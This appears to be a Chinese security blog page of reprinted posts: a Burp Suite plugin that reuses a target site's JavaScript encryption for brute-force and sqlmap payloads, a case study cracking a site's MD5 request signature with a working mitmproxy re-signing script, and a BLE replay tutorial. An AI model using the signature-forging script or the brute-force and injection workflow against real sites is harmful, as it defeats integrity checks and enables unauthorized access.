Response（200 OK + 404 Not Found）

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: "5e9f1a9b-264"
Accept-Ranges: bytes


<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
    body {
        width: 35em;
        margin: 0 auto;
        font-family: Tahoma, Verdana, Arial, sans-serif;
    }
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>

<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br />
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>

<p><em>Thank you for using nginx.</em></p>
</body>
</html>
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive


<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>

Exploit Nginx Reprint

BurpSuite作为代理，复用目标站点的js代码处理指定的内容

May 21, 2024

BurpSuite作为代理，复用目标站点的js代码处理指定的内容

本文转自thinkoaa 并作补充

0x01 前言

之前写了一个burp插件，直接使用目标站点的加密js来解决用intruder模块爆破时的payload加密问题

地址：https://www.freebuf.com/sectool/242363.html

除了上面的情况外，有时还会遇到把burp当作代理，调用网站的js代码处理来自浏览器、sqlmap等工具的内容情况。

比如目标网站的参数调用了js加密算法，不管是手动访问也好，还是sqlmap注入也好，需要调用指定算法处理参数，用python或java重写算法的话呢，时间成本太高，有些算法还挺复杂……但，如果能够直接复用目标网站的js代码的话就太方便了。

因此，简单写了一个burp suite插件，专门解决上述问题：下载地址：JSFlash

使用步骤是可以参考我之前另一个插件的文章参考地址：

1.把目标站点的相关js代码放到本地js文件中，调试可用；

2.把JSFlash插件导入到Burp Suite中，在插件中加载指定的js文件并填写对应的参数；

3.抓包发repeater做测试，如果效果符合预期，则该插件会根据指定的规则，调用js代码，处理指定的内容。

效果图：

0x02 使用方法

1.从目标站点复制修改或者手动写好js代码，调试正确

因为插件是通过java调用js，因此window、document等对象及方法，还有一些很新的js特性可能在浏览器中执行正确，但插件调用时会报错，因此插件会把可能产生的错误信息弹出显示，方便根据实际逻辑修改，根据我的经历来看，不管多复杂，只要耐心点，没有改不了的情况，如图：

再举一个例：

2.导入插件，设置参数

2.1 设置url，一定要用burp的Copy URL菜单复制，不要手动填写，以免出错：

2.2 设置处理指定内容的规则

GET方式:

php代码如图：

处理结果：

POST方式：

php代码如图：

结果如图：

一次调用多个方法，处理多个指定内容：

数据包：

规则：

php代码：

结果：

0x03 总结

这个插件用到的时候，需要具体情况具体分析，不过思路是这么个思路，目的就是复用js代码，提高工作效率。

BurpSuite Exploit Reprint

JS逆向-数据包解签名实战案例

May 14, 2024

JS逆向-数据包解签名实战案例

本文转自ichi9o 并作补充

0x00 前言

通常情况下，数据包中的签名字段会包含sign字符串，如sign、appsign等等，然后根据字段在JS代码中寻找签名的过程，并进行分析。
以下内容为一个真实案例，撒，哈气灭路！

0x01 获取被签名数据

通过数据包可知该网站的签名字段是 sign

在浏览器中的源代码搜索字段sign，找到签名代码
首当其冲的就是app.*.js样式的文件，在app.72b81572.js文件中发现了可疑点

分析 function k(e) 可知，是要对 r 参数进行签名的，r 又跟e、t、a、n 这几个参数相关，因此要搞清楚这几个参数的值是怎么来的，所有就在函数开始的第一行就下断点来跟进。
1
2
3
4
5
6
7
8
9
10
11
12
function k(e) {
    const t = g()
      , n = m();
    let a;
    a = e ? b(e) : {};
    const r = e ? `${c.a.stringify(a.hasParams)}&${t}&time=${n}` : `&${t}&time=${n}`;
    return e = Object.assign({}, a.params, {
        sign: h()(decodeURIComponent(r)),
        time: n
    }),
    e
}
首先是 t，跟进 g 函数，执行到 return 就可以发现 t = 年 + “5616” + 月 + 日

然后就是 n，这个 e 的值呢，根据跟进可知是 cookie 里面的，不过这个 e 在本案例的作用不大，最后通过 return 就可以知道返回的值就是：当前时间戳- e

接下来就是 a，根据返回的结果可知 a 的值和 e 相同，通过分析数据包可知，e的内容即请求参数（GET）或请求体（POST）

然后 r 的值就出来了，也就是签名的明文

综上所述
r = 请求内容 + & + t + & + n（这里的请求内容需要注意的是，POST Data是Json格式的要转换为：key1=value1&key1=value1…）
其中
t = 年 + “5616” + 月 + 日
n = 当前时间戳（本案例可不减e也可成功）

0x02 分析加密算法

将断点打在签名代码行，跟进代码的执行，发现加密的类名是 Md5，所有可以计算 r 的 md5 值，与代码执行的 sign 结果进行比较。

可以看到，该网站使用的是 md5 计算的 sign

0x03 编写 mitmproxy 脚本

mitmproxy 脚本是实时加载的，因此 mitmproxy 只要带着脚本运行，就可以边调试了。
mitmproxy 使用命令
1
mitmdump -p 777 -s .\mitmscript.py --flow-detail 0
关于脚本的编写这里给出以下 mitmproxy 的一些常用的属性和方法ctx：

ctx.log.info(): 用于在 mitmproxy 的日志中输出信息。

ctx.options: 用于访问 mitmproxy 的配置选项，您可以在配置文件中定义这些选项。

ctx.master: mitmproxy 的 Master 对象，提供了一些控制代理行为的方法。

ctx.proxy: mitmproxy 的 ProxyConfig 对象，提供了有关代理配置的信息。

ctx.client: mitmproxy 的 ClientConnection 对象，表示客户端连接的相关信息。

ctx.server: mitmproxy 的 ServerConnection 对象，表示服务器连接的相关信息。

ctx.protocol: mitmproxy 的 ProtocolHandler 对象，表示处理请求和响应的协议处理器。

在 mitmproxy 脚本中，可以使用以下一些回调函数来处理不同阶段的 flow 对象：

def request(flow: mitmproxy.http.HTTPFlow) -> None: 当 mitmproxy 拦截到请求时调用此回调函数，可以获取和处理请求的各种信息。

def response(flow: mitmproxy.http.HTTPFlow) -> None: 当 mitmproxy 拦截到响应时调用此回调函数，可以获取和处理响应的各种信息。

def error(flow: mitmproxy.http.HTTPFlow) -> None: 当请求或响应出现错误时调用此回调函数，可以获取和处理错误信息。

def clientconnect(flow: mitmproxy.tcp.TCPFlow) -> None: 当客户端连接到 mitmproxy 时调用此回调函数，可以获取和处理客户端连接的相关信息。

def serverconnect(flow: mitmproxy.tcp.TCPFlow) -> None: 当 mitmproxy 连接到服务器时调用此回调函数，可以获取和处理服务器连接的相关信息。

flow.request.method: 获取请求的方法（GET、POST等）。

flow.request.scheme: 获取请求的协议（http 或 https）。

flow.request.host: 获取请求的主机名。

flow.request.port: 获取请求的端口号。

flow.request.path: 获取请求的路径部分。

flow.request.url: 获取完整的请求URL。

flow.request.headers: 获取请求的头部信息，是一个字典对象，可以通过键来访问特定的头部字段。

flow.request.cookies: 获取请求中的Cookie信息，是一个字典对象，可以通过键来访问特定的Cookie。

flow.request.query: 获取请求的查询参数，是一个字典对象，可以通过键来访问特定的查询参数。

flow.request.content: 获取请求的内容，如果请求是POST请求且带有内容，则可以通过该属性来访问请求的内容。

flow.request.text: 获取请求的内容，并以文本形式返回。

flow.request.urlencoded_form: 获取请求的URL编码表单数据，是一个字典对象，可以通过键来访问特定的表单字段。

flow.request.multipart_form: 获取请求的多部分表单数据，是一个列表对象，列表中的每个元素都是一个字典，表示一个表单字段。

flow.request.content: 获取请求的原始内容，以字节形式返回。

附上本案例的代码供参考
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from datetime import datetime
from mitmproxy import ctx
import hashlib
import random
import json
import time


class Modify:
    def __init__(self):
        self.plaintext = ''
        self.new_sign = ''
        current_datetime = datetime.now()
        self.today = f"{current_datetime.year}5616{current_datetime.month:02d}{current_datetime.day:02d}"

    def md5(self):
        md5_hash = hashlib.md5()
        md5_hash.update(self.plaintext.encode('utf-8'))
        self.new_sign = md5_hash.hexdigest()

    def request(self, flow):
        if flow.request.method == "POST":
            ctx.log.info(f'\n原POST请求体：{flow.request.text}')
            data = json.loads(flow.request.get_text())
            if data != '{}' and 'sign' in data:
                del data['sign']
                del data['time']
                for k in data:
                    self.plaintext += f"{k}={str(data[k])}&"
                timestamp = int(time.time() * 1000)
                self.plaintext += f"{self.today}&time={timestamp}"
                self.md5()

                data["sign"] = self.new_sign
                data["time"] = timestamp
                flow.request.set_text(json.dumps(data).replace(' ', ''))
                ctx.log.info(f'\n新POST请求体：{flow.request.text}')
                self.plaintext = ''
            else:
                ctx.log.info('无参数，无需改签')
        elif flow.request.method == "GET":
            ctx.log.info(f'\n原GET请求体：{flow.request.query}')
            query = flow.request.query
            if query != '{}' and 'sign' in query:
                del query['sign']
                del query['time']
                if query:
                    for k in query:
                        self.plaintext += f"{k}={str(query[k])}&"
                else:
                    self.plaintext = "&"
                timestamp = int(time.time()) * 1000
                self.plaintext += f"{self.today}&time={timestamp}"
                self.md5()

                query["sign"] = self.new_sign
                query["time"] = timestamp
                ctx.log.info(f'\n新GET请求体：{flow.request.query}')
                self.plaintext = ''
            else:
                ctx.log.info('无参数，无需改签')

    @staticmethod
    def response(flow):
        if '签名校验失败!' in flow.response.text:
            ctx.log.error(f'\n签名异常：\nurl => {flow.request.path}\n异常信息 => {flow.response.text}')


addons = [
    Modify()
]

Exploit Reprint Signature

【nRF Connect】事件记录及录播和重演

Mar 6, 2024

【nRF Connect】事件记录及录播和重演

本文转自强人电子并作补充

1. 前言

nRF Connect支持缓存事件记录以及录播和重演，接下来我们看看这到底是个怎样的功能。

2. 事件记录

在连接上设备后，向左滑动可以切换到事件记录页面，同时支持多种LOG格式，如下图中连接上后执行了一次读取电量的操作：

LOG记录支持复制、保存为文件、分享和清除：

3. 事件录播和重演

nRF Connect支持事件的录播和重演，实质上就是在上一节记录的基础上，从某个时间点开始截取然后保存，录播是根据刚刚保存的记录对蓝牙设备进行一模一样的指令及数据操作。

在已连接界面中，点击右下角的红色部分：

会弹出三个图标，分别表示：

新建文件夹（用于存放后续的录播文件）

导入录播文件（导入其他地方的录播文件，本机录播的会默认显示在文件列表里，不需要导入）

开始录播

3.1 事件录播

创建一个“da bai”文件夹

点击第三个图标开始录播

开始录播后，可以发起通信事件
顺序为：开始录播 => 读取电量 => 读取厂商信息 => 读取硬件版本号 => 读取软件版本号 => 结束录播

可以看到LOG记录是这样的：

命名录播文件为”read info”以及将其移动到”da bai”文件夹下：

3.2 事件重演

录播文件保存下来后，可以对其进行重演，相当于执行一遍刚刚录播的操作：

重演录播后，我们再去看看事件记录，确实再一次操作了录播的内容，时间间隔竟然也是一样的：

3.3 事件录播文件操作

录播文件支持这些操作：

Export to XML

Rename

Move

Mirror

这里重点聊聊 Export to XML 和 Mirror。

3.3.1 Export to XML

支持将录播文件导出为XML文件可以分享给他人使用，导出之后是这样的：

<macro name="read info" icon="PLAY">
   <assert-service description="Ensure Battery Service" uuid="0000180f-0000-1000-8000-00805f9b34fb">
      <assert-characteristic description="Ensure Battery Level" uuid="00002a19-0000-1000-8000-00805f9b34fb">
         <property name="READ" requirement="MANDATORY"/>
      </assert-characteristic>
   </assert-service>
   <assert-service description="Ensure Device Information" uuid="0000180a-0000-1000-8000-00805f9b34fb">
      <assert-characteristic description="Ensure Manufacturer Name String" uuid="00002a29-0000-1000-8000-00805f9b34fb">
         <property name="READ" requirement="MANDATORY"/>
      </assert-characteristic>
      <assert-characteristic description="Ensure Hardware Revision String" uuid="00002a27-0000-1000-8000-00805f9b34fb">
         <property name="READ" requirement="MANDATORY"/>
      </assert-characteristic>
      <assert-characteristic description="Ensure Software Revision String" uuid="00002a28-0000-1000-8000-00805f9b34fb">
         <property name="READ" requirement="MANDATORY"/>
      </assert-characteristic>
   </assert-service>
   <read description="Read value of Battery Level" characteristic-uuid="00002a19-0000-1000-8000-00805f9b34fb" service-uuid="0000180f-0000-1000-8000-00805f9b34fb">
      <assert-value description="Assert value equals &apos;d&apos;" value-string="d"/>
   </read>
   <read description="Read value of Manufacturer Name String" characteristic-uuid="00002a29-0000-1000-8000-00805f9b34fb" service-uuid="0000180a-0000-1000-8000-00805f9b34fb">
      <assert-value description="Assert value equals &apos;YFTech&apos;" value-string="YFTech"/>
   </read>
   <read description="Read value of Hardware Revision String" characteristic-uuid="00002a27-0000-1000-8000-00805f9b34fb" service-uuid="0000180a-0000-1000-8000-00805f9b34fb">
      <assert-value description="Assert value equals &apos;UVWbejJZpqrsPtwuvxy&apos;" value-string="UVWbejJZpqrsPtwuvxy"/>
   </read>
   <read description="Read value of Software Revision String" characteristic-uuid="00002a28-0000-1000-8000-00805f9b34fb" service-uuid="0000180a-0000-1000-8000-00805f9b34fb">
      <assert-value description="Assert value equals &apos;V 2.66.0329&apos;" value-string="V 2.66.0329"/>
   </read>
</macro>

3.3.2 录播文件导入

导入之后自动重命名为read info 2。

3.3.3 Mirror

这里的镜像指的是角色镜像，比如录播文件里面你是中央设备，镜像之后你就变成了外围设备。这里必须注意当你是外围设备的时候，需要将GATT SERVICE配置成录播文件的一样的配置，具体配置方法可以参考GATT SERVICE配置，建议使用克隆方式。

4. 写在最后

在BLE开发中，同样的测试内容通常不止操作一次，此时我们可以用上本章的内容，事半功倍！

看完本文觉得有帮助点赞鼓励鼓励吧~如果有问题可以在评论区留言，大白会用光的速度回复您。想了解关于nRF Connect的更多用法及使用技巧，可以关注nRF Connect 专栏。

BlueTooth Reprint nRF Connect